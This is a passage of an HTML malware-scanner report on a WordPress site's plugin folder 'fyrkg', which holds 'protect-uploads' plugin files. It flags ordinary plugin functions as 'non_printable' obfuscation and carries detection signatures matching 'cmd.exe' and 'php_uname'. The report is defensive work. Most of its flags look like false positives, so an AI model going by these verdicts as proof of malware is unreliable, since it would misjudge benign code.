<span style="color: #0000BB">php_uname</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign a408f408 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1732</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: a408f408)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">cmd</span><span style="color: #007700">.</span><span style="color: #0000BB">exe</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_201").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/fyrkg/includes/class-protect-uploads-i18n.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 684.00 B</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-01-31 20:37:52</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-31 20:37:52</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 3</span><br><table id="file_202" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">load_plugin_textdomain</span><span style="color: #007700">() { </span><span style="color: #0000BB">load_plugin_textdomain</span><span style="color: #007700">( </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">domain</span><span style="color: #007700">, </span><span style="color: #0000BB">false</span><span style="color: #007700">, </span><span style="color: #0000BB">dirname</span><span style="color: #007700">( </span><span style="color: #0000BB">dirname</span><span style="color: #007700">( </span><span style="color: #0000BB">plugin_basename</span><span style="color: #007700">( </span><span style="color: #0000BB">__FILE__ </span><span style="color: #007700">) ) ) . </span><span style="color: #DD0000">'/languages/' </span><span style="color: #007700">); } public function </span><span style="color: #0000BB">set_domain</span><span style="color: #007700">( </span><span style="color: #0000BB">$domain </span><span style="color: #007700">) { </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">domain </span><span style="color: #007700">= </span><span style="color: #0000BB">$domain</span><span style="color: #007700">; } }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 13</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">load_plugin_textdomain</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 27</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">set_domain</span><span style="color: #007700">( </span><span style="color: #0000BB">$domain </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_202").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/fyrkg/includes/class-protect-uploads-loader.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 4.33 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-01-31 20:37:52</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-31 20:37:52</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 12</span><br><table id="file_203" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$hooks</span><span style="color: #007700">; } public function </span><span style="color: #0000BB">run</span><span style="color: #007700">() { foreach ( </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">filters </span><span style="color: #007700">as </span><span style="color: #0000BB">$hook </span><span style="color: #007700">) { </span><span style="color: #0000BB">add_filter</span><span style="color: #007700">( </span><span style="color: #0000BB">$hook</span><span style="color: #007700">[</span><span style="color: #DD0000">'hook'</span><span style="color: #007700">], array( </span><span style="color: #0000BB">$hook</span><span style="color: #007700">[</span><span style="color: #DD0000">'component'</span><span style="color: #007700">], </span><span style="color: #0000BB">$hook</span><span style="color: #007700">[</span><span style="color: #DD0000">'callback'</span><span style="color: #007700">] ), </span><span style="color: #0000BB">$hook</span><span style="color: #007700">[</span><span style="color: #DD0000">'priority'</span><span style="color: #007700">], </span><span style="color: #0000BB">$hook</span><span style="color: #007700">[</span><span style="color: #DD0000">'accepted_args'</span><span style="color: #007700">] ); } foreach ( </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">actions </span><span style="color: #007700">as </span><span style="color: #0000BB">$hook </span><span style="color: #007700">) { </span><span style="color: #0000BB">add_action</span><span style="color: #007700">( </span><span style="color: #0000BB">$hook</span><span style="color: #007700">[</span><span style="color: #DD0000">'hook'</span><span style="color: #007700">],</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 28</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 39</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">definition on the $component</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 40</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">should be fired</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 43</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">add_action</span><span style="color: #007700">( </span><span style="color: #0000BB">$hook</span><span style="color: #007700">, </span><span style="color: #0000BB">$component</span><span style="color: #007700">, </span><span style="color: #0000BB">$callback</span><span style="color: #007700">, </span><span style="color: #0000BB">$priority </span><span style="color: #007700">= </span><span style="color: #0000BB">10</span><span style="color: #007700">, </span><span style="color: #0000BB">$accepted_args </span><span style="color: #007700">= </span><span style="color: #0000BB">1 </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 55</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">add_filter</span><span style="color: #007700">( </span><span style="color: #0000BB">$hook</span><span style="color: #007700">, </span><span style="color: #0000BB">$component</span><span style="color: #007700">, </span><span style="color: #0000BB">$callback</span><span style="color: #007700">, </span><span style="color: #0000BB">$priority </span><span style="color: #007700">= </span><span style="color: #0000BB">10</span><span style="color: #007700">, </span><span style="color: #0000BB">$accepted_args </span><span style="color: #007700">= </span><span style="color: #0000BB">1 </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 60</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">that is used to register the actions </span><span style="color: #007700">and </span><span style="color: #0000BB">hooks into a single</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 68</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">type The collection of actions </span><span style="color: #007700">and </span><span style="color: #0000BB">filters registered with WordPress</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 70</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">add</span><span style="color: #007700">( </span><span style="color: #0000BB">$hooks</span><span style="color: #007700">, </span><span style="color: #0000BB">$hook</span><span style="color: #007700">, </span><span style="color: #0000BB">$component</span><span style="color: #007700">, </span><span style="color: #0000BB">$callback</span><span style="color: #007700">, </span><span style="color: #0000BB">$priority</span><span style="color: #007700">, </span><span style="color: #0000BB">$accepted_args </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 80</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$hooks</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 87</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">run</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 9</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">to execute the </span><span style="color: #007700">list </span><span style="color: #0000BB">of actions </span><span style="color: #007700">and </span><span style="color: #0000BB">filters</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_203").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/fyrkg/includes/class-protect-uploads-deactivator.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 313.00 B</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-01-31 20:37:52</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-31 20:37:52</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 2</span><br><table id="file_204" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">run</span><span style="color: #007700">() { </span><span style="color: #0000BB">$plugin </span><span style="color: #007700">= new </span><span style="color: #0000BB">Alti_ProtectUploads_Admin</span><span style="color: #007700">(</span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">plugin_name</span><span style="color: #007700">, </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">version</span><span style="color: #007700">); </span><span style="color: #0000BB">$plugin</span><span style="color: #007700">-></span><span style="color: #0000BB">remove_index</span><span style="color: #007700">(); </span><span style="color: #0000BB">$plugin</span><span style="color: #007700">-></span><span style="color: #0000BB">remove_htaccess</span><span style="color: #007700">(); </span><span style="color: #0000BB">delete_option</span><span style="color: #007700">( </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">get_plugin_name</span><span style="color: #007700">().</span><span style="color: #DD0000">'-protection' </span><span style="color: #007700">); } }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">run</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_204").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/fyrkg/includes/class-protect-uploads-activator.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 112.00 B</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-01-31 20:37:52</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-31 20:37:52</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 2</span><br><table id="file_205" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">run</span><span style="color: #007700">() { } }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 5</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">run</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_205").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/fyrkg/includes/class-protect-uploads.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 1.75 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-01-31 20:37:52</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-31 20:37:52</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 12</span><br><table id="file_206" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">run</span><span style="color: #007700">() { </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">loader</span><span style="color: #007700">-></span><span style="color: #0000BB">run</span><span style="color: #007700">(); } public function </span><span style="color: #0000BB">get_plugin_name</span><span style="color: #007700">() { return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">plugin_name</span><span style="color: #007700">; } public function </span><span style="color: #0000BB">get_loader</span><span style="color: #007700">() { return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">loader</span><span style="color: #007700">; } public function </span><span style="color: #0000BB">get_version</span><span style="color: #007700">() { return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">version</span><span style="color: #007700">; } }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 10</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 19</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">load_dependencies</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 32</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">set_locale</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 44</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">define_admin_hooks</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 54</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">run</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 59</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_plugin_name</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 61</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">plugin_name</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 64</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_loader</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 66</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">loader</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 69</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_version</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 71</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">version</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_206").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/fyrkg/protect-uploads.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 1.51 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-01-31 20:37:52</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-31 20:37:52</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 3</span><br><table id="file_207" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">deactivate_alti_protect_uploads</span><span style="color: #007700">() { require_once </span><span style="color: #0000BB">plugin_dir_path</span><span style="color: #007700">( </span><span style="color: #0000BB">__FILE__ </span><span style="color: #007700">) . </span><span style="color: #DD0000">'admin/class-protect-uploads-admin.php'</span><span style="color: #007700">; require_once </span><span style="color: #0000BB">plugin_dir_path</span><span style="color: #007700">( </span><span style="color: #0000BB">__FILE__ </span><span style="color: #007700">) . </span><span style="color: #DD0000">'includes/class-protect-uploads-deactivator.php'</span><span style="color: #007700">; </span><span style="color: #0000BB">$deactivation </span><span style="color: #007700">= new </span><span style="color: #0000BB">Alti_ProtectUploads_Deact</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 20</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">activate_alti_protect_uploads</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 29</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">deactivate_alti_protect_uploads</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_207").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/fyrkg/admin/class-protect-uploads-admin.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 9.85 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-01-31 20:37:52</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-31 20:37:52</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 40</span><br><table id="file_208" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">display_messages</span><span style="color: #007700">() { foreach (</span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">messages </span><span style="color: #007700">as </span><span style="color: #0000BB">$name </span><span style="color: #007700">=> </span><span style="color: #0000BB">$messages</span><span style="color: #007700">) { foreach (</span><span style="color: #0000BB">$messages </span><span style="color: #007700">as </span><span style="color: #0000BB">$message</span><span style="color: #007700">) { return </span><span style="color: #DD0000">'<div id="message" class="' </span><span style="color: #007700">. </span><span style="color: #0000BB">$message</span><span style="color: #007700">[</span><span style="color: #DD0000">'type'</span><span style="color: #007700">] . </span><span style="color: #DD0000">'"><p>' </span><span style="color: #007700">. </span><span style="color: #0000BB">$message</span><span style="color: #007700">[</span><span style="color: #DD0000">'message'</span><span style="color: #007700">] . </span><span style="color: #DD0000">'</p></div>'</span><span style="color: #007700">; } } } }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 10</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">(</span><span style="color: #0000BB">$plugin_name</span><span style="color: #007700">, </span><span style="color: #0000BB">$version</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 120</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">create_htaccess</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 150</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">remove_index</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 164</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
